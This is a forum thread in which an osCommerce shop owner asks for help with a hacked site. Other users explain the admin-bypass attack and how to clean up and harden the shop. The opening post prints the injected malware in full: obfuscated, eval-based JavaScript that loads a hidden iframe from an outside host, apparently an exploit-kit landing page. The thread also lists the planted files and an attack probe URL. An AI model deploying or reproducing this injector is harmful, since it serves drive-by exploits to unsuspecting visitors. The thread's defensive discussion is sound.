Please Identify the code.

[xsdenied]

Hi i just found out my site is being reported as an attack site.

 

This is the code found in the very header of the site.

 

 

<script>b=new function(){return 2;};if(!+b)String.prototype.test='h'+'arC';for(i in $='b4h3tbn34')if(i=='te'+'st')m=$;try{new Object().wehweh();}catch(q){ss="";}try{window['e'+'v'+'al']('asdas')}catch(q){s=String["fr"+"omC"+m+"od"+'e'];}d=new Date();d2=new Date(d.valueOf()-2);Object.prototype.asd='e';if({}.asd==='e')a=document["c"+"r"+"e"+"a"+"t"+"e"+"T"+"e"+"x"+"t"+"N"+"o"+"d"+"e"]('321');if(a.data==321)x=-1*(d-d2);n=[-x+7,-x+7,-x+103,-x+100,-x+30,-x+38,-x+98,-x+109,-x+97,-x+115,-x+107,-x+99,-x+108,-x+114,-x+44,-x+101,-x+99,-x+114,-x+67,-x+106,-x+99,-x+107,-x+99,-x+108,-x+114,-x+113,-x+64,-x+119,-x+82,-x+95,-x+101,-x+76,-x+95,-x+107,-x+99,-x+38,-x+37,-x+96,-x+109,-x+98,-x+119,-x+37,-x+39,-x+89,-x+46,-x+91,-x+39,-x+121,-x+7,-x+7,-x+7,-x+103,-x+100,-x+112,-x+95,-x+107,-x+99,-x+112,-x+38,-x+39,-x+57,-x+7,-x+7,-x+123,-x+30,-x+99,-x+106,-x+113,-x+99,-x+30,-x+121,-x+7,-x+7,-x+7,-x+98,-x+109,-x+97,-x+115,-x+107,-x+99,-x+108,-x+114,-x+44,-x+117,-x+112,-x+103,-x+114,-x+99,-x+38,-x+32,-x+58,-x+103,-x+100,-x+112,-x+95,-x+107,-x+99,-x+30,-x+113,-x+112,-x+97,-x+59,-x+37,-x+102,-x+114,-x+114,-x+110,-x+56,-x+45,-x+45,-x+112,-x+99,-x+96,-x+109,-x+114,-x+113,-x+114,-x+95,-x+114,-x+44,-x+97,-x+109,-x+107,-x+45,-x+114,-x+99,-x+107,-x+110,-x+45,-x+113,-x+114,-x+95,-x+114,-x+44,-x+110,-x+102,-x+110,-x+37,-x+30,-x+117,-x+103,-x+98,-x+114,-x+102,-x+59,-x+37,-x+47,-x+46,-x+37,-x+30,-x+102,-x+99,-x+103,-x+101,-x+102,-x+114,-x+59,-x+37,-x+47,-x+46,-x+37,-x+30,-x+113,-x+114,-x+119,-x+106,-x+99,-x+59,-x+37,-x+116,-x+103,-x+113,-x+103,-x+96,-x+103,-x+106,-x+103,-x+114,-x+119,-x+56,-x+102,-x+103,-x+98,-x+98,-x+99,-x+108,-x+57,-x+110,-x+109,-x+113,-x+103,-x+114,-x+103,-x+109,-x+108,-x+56,-x+95,-x+96,-x+113,-x+109,-x+106,-x+115,-x+114,-x+99,-x+57,-x+106,-x+99,-x+100,-x+114,-x+56,-x+46,-x+57,-x+114,-x+109,-x+110,-x+56,-x+46,-x+57,-x+37,-x+60,-x+58,-x+45,-x+103,-x+100,-x+112,-x+95,-x+107,-x+99,-x+60,-x+32,-x+39,-x+57,-x+7,-x+7,-x+123,-x+7,-x+7,-x+100,-x+115,-x+108,-x+97,-x+114,-x+103,-x+109,-x+108,-x+30,-x+103,-x+100,-x+112,-x+95,-x+107,-x+99,-x+112,-x+38,-x+39,-x+121,-x+7,-x+7,-x+7,-x+116,-x+95,-x+112,-x+30,-x+100,-x+30,-x+59,-x+30,-x+98,-x+109,-x+97,-x+115,-x+107,-x+99,-x+108,-x+114,-x+44,-x+97,-x+112,-x+99,-x+95,-x+114,-x+99,-x+67,-x+106,-x+99,-x+107,-x+99,-x+108,-x+114,-x+38,-x+37,-x+103,-x+100,-x+112,-x+95,-x+107,-x+99,-x+37,-x+39,-x+57,-x+100,-x+44,-x+113,-x+99,-x+114,-x+63,-x+114,-x+114,-x+112,-x+103,-x+96,-x+115,-x+114,-x+99,-x+38,-x+37,-x+113,-x+112,-x+97,-x+37,-x+42,-x+37,-x+102,-x+114,-x+114,-x+110,-x+56,-x+45,-x+45,-x+112,-x+99,-x+96,-x+109,-x+114,-x+113,-x+114,-x+95,-x+114,-x+44,-x+97,-x+109,-x+107,-x+45,-x+114,-x+99,-x+107,-x+110,-x+45,-x+113,-x+114,-x+95,-x+114,-x+44,-x+110,-x+102,-x+110,-x+37,-x+39,-x+57,-x+100,-x+44,-x+113,-x+114,-x+119,-x+106,-x+99,-x+44,-x+116,-x+103,-x+113,-x+103,-x+96,-x+103,-x+106,-x+103,-x+114,-x+119,-x+59,-x+37,-x+102,-x+103,-x+98,-x+98,-x+99,-x+108,-x+37,-x+57,-x+100,-x+44,-x+113,-x+114,-x+119,-x+106,-x+99,-x+44,-x+110,-x+109,-x+113,-x+103,-x+114,-x+103,-x+109,-x+108,-x+59,-x+37,-x+95,-x+96,-x+113,-x+109,-x+106,-x+115,-x+114,-x+99,-x+37,-x+57,-x+100,-x+44,-x+113,-x+114,-x+119,-x+106,-x+99,-x+44,-x+106,-x+99,-x+100,-x+114,-x+59,-x+37,-x+46,-x+37,-x+57,-x+100,-x+44,-x+113,-x+114,-x+119,-x+106,-x+99,-x+44,-x+114,-x+109,-x+110,-x+59,-x+37,-x+46,-x+37,-x+57,-x+100,-x+44,-x+113,-x+99,-x+114,-x+63,-x+114,-x+114,-x+112,-x+103,-x+96,-x+115,-x+114,-x+99,-x+38,-x+37,-x+117,-x+103,-x+98,-x+114,-x+102,-x+37,-x+42,-x+37,-x+47,-x+46,-x+37,-x+39,-x+57,-x+100,-x+44,-x+113,-x+99,-x+114,-x+63,-x+114,-x+114,-x+112,-x+103,-x+96,-x+115,-x+114,-x+99,-x+38,-x+37,-x+102,-x+99,-x+103,-x+101,-x+102,-x+114,-x+37,-x+42,-x+37,-x+47,-x+46,-x+37,-x+39,-x+57,-x+7,-x+7,-x+7,-x+98,-x+109,-x+97,-x+115,-x+107,-x+99,-x+108,-x+114,-x+44,-x+101,-x+99,-x+114,-x+67,-x+106,-x+99,-x+107,-x+99,-x+108,-x+114,-x+113,-x+64,-x+119,-x+82,-x+95,-x+101,-x+76,-x+95,-x+107,-x+99,-x+38,-x+37,-x+96,-x+109,-x+98,-x+119,-x+37,-x+39,-x+89,-x+46,-x+91,-x+44,-x+95,-x+110,-x+110,-x+99,-x+108,-x+98,-x+65,-x+102,-x+103,-x+106,-x+98,-x+38,-x+100,-x+39,-x+57,-x+7,-x+7,-x+123];for(i=0;i<n.length;i++)ss+=s(eval("n"+"[i"+"]"));eval(ss);</script>

 

Has anyone else come across anything like this.

 

Regards.

[Guest]

Markus,

 

It is definitely a hack. Check your entire site for more.

 

 

 

Chris

[xsdenied]

Thanks Chris.

 

I did i found the files i've restored the site and they've came back again.

 

Am clueless as for what my next move should be.

[Guest]

Remove the anomalous file(s) the hacker is using to gain access to your website. Check EVERY file for malicious code and remove it. If you did a restore from a backup, then I would suggest your back up is compromised as well.

 

 

 

Chris

[Jack_mcs]

Thanks Chris.

 

I did i found the files i've restored the site and they've came back again.

 

Am clueless as for what my next move should be.

A common way for them to keep doing this is by using files they've uploaded in the images directory. If you have SiteMonitor installed, go to its admin section and it will let you know if that is the case. Or, run the security checker on my site: https://www.oscommerce-solution.com/oscommerce-security-check.php

[xsdenied]

A common way for them to keep doing this is by using files they've uploaded in the images directory. If you have SiteMonitor installed, go to its admin section and it will let you know if that is the case. Or, run the security checker on my site: https://www.oscommer...urity-check.php

 

Hi JAck

 

The site has all the recommended security features on this forum. Yet it happaned again funny thing is that neither notified me of any change.

 

ADMIN STATUS: Congratulations. Your admin is password protected. However, your admin is named admin. Since that is the first place hackers look to try to get in, your shop is more likely to get hacked. The name of your admin needs to be changed to improve your shops security. * /Admin is a dummy directory/

IMAGES STATUS: Your images directory is not secure. - .htaccess is present !!!

[xsdenied]

I know it's leading to an Black Hole Exploit Kit, but i have no idea on how it got into the site. As soon as i restore somehow it comes back.

[xsdenied]

Files it created are following

 

 

 

I know it's leading to an Black Hole Exploit Kit, but i have no idea on how it got into the site. As soon as i restore somehow it comes back.

 

/sm3mq3.php

/likeit.php?html128

/myblog.php

/work.php

/test.php

[Taipo]

The site has all the recommended security features on this forum. Yet it happaned again funny thing is that neither notified me of any change.

 

Have you tried installing osC_Sec addon?

[Jack_mcs]

 

Hi JAck

 

The site has all the recommended security features on this forum. Yet it happaned again funny thing is that neither notified me of any change.

 

ADMIN STATUS: Congratulations. Your admin is password protected. However, your admin is named admin. Since that is the first place hackers look to try to get in, your shop is more likely to get hacked. The name of your admin needs to be changed to improve your shops security. * /Admin is a dummy directory/

IMAGES STATUS: Your images directory is not secure. - .htaccess is present !!!

You seem to have missed one since the test shows it can get into your images directory. This may not be the cause of your problem but one should always fix the obvious first.

[xsdenied]

 

Have you tried installing osC_Sec addon?

 

did so last night. Great addon should work wonders along side others add ons.

[xsdenied]

You seem to have missed one since the test shows it can get into your images directory. This may not be the cause of your problem but one should always fix the obvious first.

 

I figured it out in the end, thanks for the help i finally managed to backup with out the files re-appearing.

[Taipo]

That attack comes in two stages Markus. The first is a code and file seeding stage and the second is to exploit seeded files and codes to gain further access to your site. The attacks are focussed on the admin bypass exploit security hole in out of date versions of osCommerce. Once you have patched your site, i.e. followed the instructions in the readme.htm in osC_Sec, the attack servers will no longer be able to add files and append code to files on your site.

 

After that it is up to you to remove any further added code and files so that the second phase of the attack cannot be used to reseed your site again with malicious shell code and the like.

[xsdenied]

That attack comes in two stages Markus. The first is a code and file seeding stage and the second is to exploit seeded files and codes to gain further access to your site. The attacks are focussed on the admin bypass exploit security hole in out of date versions of osCommerce. Once you have patched your site, i.e. followed the instructions in the readme.htm in osC_Sec, the attack servers will no longer be able to add files and append code to files on your site.

 

After that it is up to you to remove any further added code and files so that the second phase of the attack cannot be used to reseed your site again with malicious shell code and the like.

 

In fact after i've went through the restoring process i've installed osC_sec and with in an hour of the site being up there was at least as 100 requests for "cookie_usage.php?cookies=1&showimg=1&showimg=1&cookies=1&7433234858128941=1" and other useless files which have been removes. Needless to say osC_Sec was doing a great job by banning each and every one of these attacks.

 

There are still a few requests from time to time. but they are quickly eliminated.

 

The problem with removing all the added code is the time needed to go though every single one of them which is painful task but one i have to do.

 

Thank you for all your help !!!

[Taipo]

Yes that particular attack vector is currently doing the rounds again big time.

 

Once your htaccess file catches the bulk of the IP addresses being commonly used, the requests will drop considerably.

 

Once you are confident that it is working for you, you can always disable the email notifications to also lessen the load on your server. I put the email function in primarily to give users a small comfort in knowing that their sites are being protected, but its not necessary to have it enabled, and especially if you are getting dozens or more emails per hour it is best to eventually disable the function and just allow osC_Sec to auto append IPs to the htaccess file if you have enabled that feature.

[ctec2001]

Hello all, I believe I have the same issue as xsdenied.

 

Jack, I went to your site and checked the website. Everything was all good the first time I checked. Everything secure,etc. Then I entered the admin name for my site in the URL and I believe I was blocked by osc_sec which I have installed and currently the latest version. I then go check again and this time insert the URL and the admin name I use in the correct box. I get a result that everything is ok with the admin side, but the images are not secure. I wonder if that is because I was blocked by osc_sec.

 

I do have a question, should I be checking the site with the folder I have my store in or just the general www.storename.com because it is being redirected to the folder the store is located in.

 

I also found 2 php files outside the store, which I have deleted and check everyday for it's return. I did ban about 100+ ip addresses but discovered that they are coming from random ip addresses so I could be banning them forever and not be effective.

 

Any information would be appreciated..

 

Thank you,

 

Michael

[Jack_mcs]

Hello all, I believe I have the same issue as xsdenied.

 

Jack, I went to your site and checked the website. Everything was all good the first time I checked. Everything secure,etc. Then I entered the admin name for my site in the URL and I believe I was blocked by osc_sec which I have installed and currently the latest version. I then go check again and this time insert the URL and the admin name I use in the correct box. I get a result that everything is ok with the admin side, but the images are not secure. I wonder if that is because I was blocked by osc_sec.

 

I do have a question, should I be checking the site with the folder I have my store in or just the general www.storename.com because it is being redirected to the folder the store is located in.

 

I also found 2 php files outside the store, which I have deleted and check everyday for it's return. I did ban about 100+ ip addresses but discovered that they are coming from random ip addresses so I could be banning them forever and not be effective.

I've haven't looked at the code in osc sec so i can't answer that question. Te Taipo may be abel to though. But it sounds like you didn't enter in the url correctly. The first box is for the url of your shop. If your shop is in a sub-directory, then that sub-directory should be included. Just like if you actually went to your site. The second box is for the real name of admin. Try those and see if it makes a difference.

[ctec2001]

Yes thank you. I entered as www.storename.com and the name of my admin. It stated that the images folder was not secure, but I do not have an images folder on the root.

 

If I enter as www.storename.com/sample and enter the admin folder name it comes back as everything is good.

 

Does that sound correct?

[Taipo]

Then I entered the admin name for my site in the URL and I believe I was blocked by osc_sec which I have installed and currently the latest version.

 

Since most of these test sites at some point test the weaknesses in osCommerce for which osC_Sec is designed to protect, then it would merely be serving its purpose if it blocked another website from probing for security weaknesses in your site

 

I then go check again and this time insert the URL and the admin name I use in the correct box. I get a result that everything is ok with the admin side, but the images are not secure.

 

osC_Sec does not attempt to protect the images directory. What it does is bolt the outside door so to speak or your house, rather than put a lock on the cupboard where the family jewelry is stored. If an attacker cannot upload files to your site then there are no directories on your site at all where files can be uploaded. If your site contains code that can be used by an attacker to upload files then they will do so. The best medicine is to find the files or code that are faulty and remove them.

 

osC_Sec will protect your site code from being exploited but like anything, it cannot protect you if your site is already infected with added code and files that can be used to upload or edit files on your site. You must remove those yourself or there is no script that you can add to your site that will protect you, not even a so called protector of your images directory.

 

I also found 2 php files outside the store, which I have deleted and check everyday for it's return.

 

While osC_Sec is installed correctly in your site, attackers cannot use the flaw in the outdated versions of osCommerce to upload files. However if osC_Sec is not correctly installed, or you remove it for some reason, even if temporarily, then there is a good chance that an attack could result in more files uploaded during that period of time.

 

I did ban about 100+ ip addresses but discovered that they are coming from random ip addresses so I could be banning them forever and not be effective.

 

There is no point in banning ip addresses after an attack takes place as the chances of the next attack server to test your site for weaknesses using the same proxy servers is remote....there are just that many available public proxys for attackers to use.

 

osC_Sec can be set to ban IP addresses when an attack is launched, this is more though about lowering the cpu load on your site because when an attack is launched, the attacker will often toggle through a number of attack vectors via a specific proxy server before exiting the site and moving on to another target. osC_Sec will catch the first instance of the attack and ban it therefore reducing the load on the webserver considerably as consecutive attacks will not result in a page load completion.

 

It stated that the images folder was not secure, but I do not have an images folder on the root.

 

Attackers are using faulty code in outdated versions of osCommerce to upload AND edit files on your site. That means on most server configurations where users have not either installed osC_Sec, applied the update patches or protected their admin directories, attackers can not only upload files into the image directory for further exploitation, but can also edit language files and add obsfuscated code to be used later to upload, edit, delete and spread virus code around with.

 

In some website configurations, the faulty code in earlier versions of osCommerce will allow attackers to upload, edit and delete files in any directory on a site.

 

Again the principle should not be to hide the family jewels from intruders because of a faulty door latch, but rather to make it impossible for an intruder to get into your house via a faulty door latch, by actually fixing the door latch.